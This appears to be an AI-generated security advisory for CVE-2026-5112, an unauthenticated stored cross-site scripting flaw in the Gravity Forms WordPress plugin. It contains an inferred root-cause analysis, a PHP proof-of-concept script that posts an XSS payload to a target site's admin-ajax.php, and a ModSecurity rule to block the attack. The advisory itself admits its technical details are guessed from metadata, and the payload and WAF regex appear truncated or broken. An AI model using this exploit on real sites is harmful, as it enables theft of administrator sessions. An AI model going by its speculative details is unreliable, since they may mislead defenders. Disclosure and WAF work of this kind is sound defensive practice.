Atomic Edge Proof of Concept automated generator using AI diff analysis
Published: May 4, 2026

CVE-2026-5112: Gravity Forms <= 2.10.0 – Unauthenticated Stored Cross-Site Scripting via Calculation Product Field in Repeater (gravityforms)

CVE ID: CVE-2026-5112
Plugin: gravityforms
Severity: High (CVSS 7.2)
CWE: 79
Vulnerable Version: 2.10.0
Patched Version:
Disclosed: April 30, 2026

Analysis Overview

Analysis (analysis)

Atomic Edge analysis of CVE-2026-5112 (metadata-based): This vulnerability allows unauthenticated stored cross-site scripting (XSS) in the Gravity Forms plugin for WordPress versions up to and including 2.10.0. The attack bypasses input validation in the Calculation product field type when used inside a Repeater field. Successful exploitation requires no authentication or user interaction, and the injected script executes when an administrator with the gravityforms_view_entries capability views the entry details page.

Root Cause: The vulnerability stems from three distinct failures in the plugin's input handling chain. First, the GF_Field_Calculation::validate() method only validates the quantity subfield (.3) of a Calculation product field but completely ignores the product name subfield (.1). Second, the sanitize_entry_value() method returns the raw value without sanitization for fields where HTML is not expected, such as the product name. Third, the get_value_entry_detail() method in the Repeater field concatenates the unescaped product name directly into the output string without any escaping. Atomic Edge analysis infers this chain from the CWE-79 classification and the detailed vulnerability description, as no patch diff is available for direct code verification.

Exploitation: An unauthenticated attacker crafts a form submission targeting a Gravity Forms instance that uses a Calculation product field inside a Repeater field. The attacker supplies a malicious payload in the product name parameter (likely named input_{field_id}.1) while providing a legitimate numeric value in the quantity parameter (input_{field_id}.3). The payload, for example alert(document.cookie), passes validation because the product name field is never checked. The form submission endpoint is typically the standard WordPress admin-ajax.php with the gform_submit action, or the plugin's built-in AJAX submission handler. The attacker does not need to know or provide any nonce, as the vulnerability lies in server-side validation logic that does not verify authentication.

Remediation: The fix in version 2.10.1 likely requires changes to all three vulnerable methods. The validate() method must sanitize the product name subfield (.1) using WordPress functions like wp_kses() or similar HTML-stripping functions. The sanitize_entry_value() method must apply output escaping via esc_html() or sanitize_text_field() to product name values before storage. The get_value_entry_detail() method in the Repeater field must escape output with esc_html() when rendering product names. These changes align with the CWE-79 pattern and are standard hardening practices for fields that may contain user-supplied text but should not contain HTML.

Impact: Successful exploitation allows an unauthenticated attacker to execute arbitrary JavaScript in the browser of any administrator who views the compromised entry. This can lead to session hijacking via cookie theft, credential theft by injecting fake login forms, and potential privilege escalation if the attacker's script interacts with the WordPress REST API or AJAX handlers as the administrator. The CVSS score of 7.2 (High) reflects the network-based, low-complexity nature of the attack with no required privileges or user interaction, though the impact is limited to confidentiality and integrity (no denial of service).

Proof of Concept (poc_php)

<?php
// Atomic Edge CVE Research – Proof of Concept (metadata-based)
// CVE-2026-5112 – Gravity Forms <= 2.10.0 – Unauthenticated Stored Cross-Site Scripting via Calculation Product Field in Repeater

// Configuration – change these values
$target_url = 'http://example.com'; // Target WordPress site URL without trailing slash
$form_id = 1; // Replace with actual form ID that has a Calculation product field inside a Repeater
$field_id = 1; // Replace with the actual field ID of the Calculation product field (check form editor for the numeric ID)

// The XSS payload
$payload = 'alert("XSS: "+document.cookie)';

// Build the submission data
// Standard Gravity Forms AJAX submission via admin-ajax.php
$submit_url = $target_url . '/wp-admin/admin-ajax.php';

$post_data = array(
    'action' => 'gform_submit', // Standard Gravity Forms AJAX action
    'gform_submit' => $form_id,
    'is_submit_' . $form_id => '1',
    'input_' . $field_id . '.1' => $payload, // Malicious product name (field .1 is the name)
    'input_' . $field_id . '.3' => '1', // Valid quantity (field .3 is the numeric quantity)
    'gform_unique_id' => '', // Can be empty for unauthenticated submissions
    'state_' . $form_id => '', // Optional state parameter
    'target_page' => '0',
    'source_page' => '1',
    'gform_ajax' => '1', // Indicates AJAX submission
);

// Initialize cURL
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $submit_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HTTPHEADER, array(
    'Content-Type: application/x-www-form-urlencoded',
    'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36',
));
curl_setopt($ch, CURLOPT_COOKIE, ''); // No authentication needed
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); // For testing; set to true in production
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);

$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

// Detect success – check for Gravity Forms specific response patterns
if ($http_code == 200 && strpos($response, 'success') !== false) {
    echo "[+] Payload submitted successfully!\n";
    echo "[+] An administrator viewing the entry detail page for this submission will trigger the XSS.\n";
    echo "[+] The payload alert(\"XSS: \"+document.cookie) will execute in their browser.\n";
} else {
    echo "[!] Submission may have failed. HTTP code: " . $http_code . "\n";
    echo "[!] Response (truncated): " . substr($response, 0, 500) . "\n";
    echo "[!] Verify the form ID and field ID. The form must have a Calculation product field inside a Repeater.\n";
}

// Explanation:
// This PoC submits the XSS payload in the product name subfield (.1) of a Calculation product field.
// The quantity subfield (.3) receives a valid numeric value to pass server-side validation.
// The plugin's validate() method only checks the quantity field, leaving the product name unsanitized.
// When the entry is viewed in wp-admin, the unescaped product name renders the XSS payload.
?>

ModSecurity Rule (modsecurity_rule)

# Atomic Edge WAF Rule – CVE-2026-5112 (metadata-based)
# Blocks unauthenticated stored XSS via Calculation product field in Gravity Forms Repeater
# Target: POST to admin-ajax.php with action gform_submit, injecting HTML in product name field (.1)

SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php" \
    "id:20265112,phase:2,deny,status:403,chain,msg:'CVE-2026-5112: Gravity Forms Unauthenticated Stored XSS via Calculation Product Field in Repeater',severity:'CRITICAL',tag:'CVE-2026-5112',tag:'wordpress',tag:'gravityforms'"
    SecRule ARGS_POST:action "@streq gform_submit" \
        "chain"
    SecRule ARGS_POST:/input_\d+\.1/ "@rx ]*script|onerror|onload|onmouseover|javascript:" \
        "t:lowercase,chain"
    SecRule ARGS_POST:/input_\d+\.3/ "@rx ^\d+$"

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website and the internet. Our AI inspection and analysis engine automatically blocks threats before traditional firewall services can inspect them, research them, and build archaic regex filters.
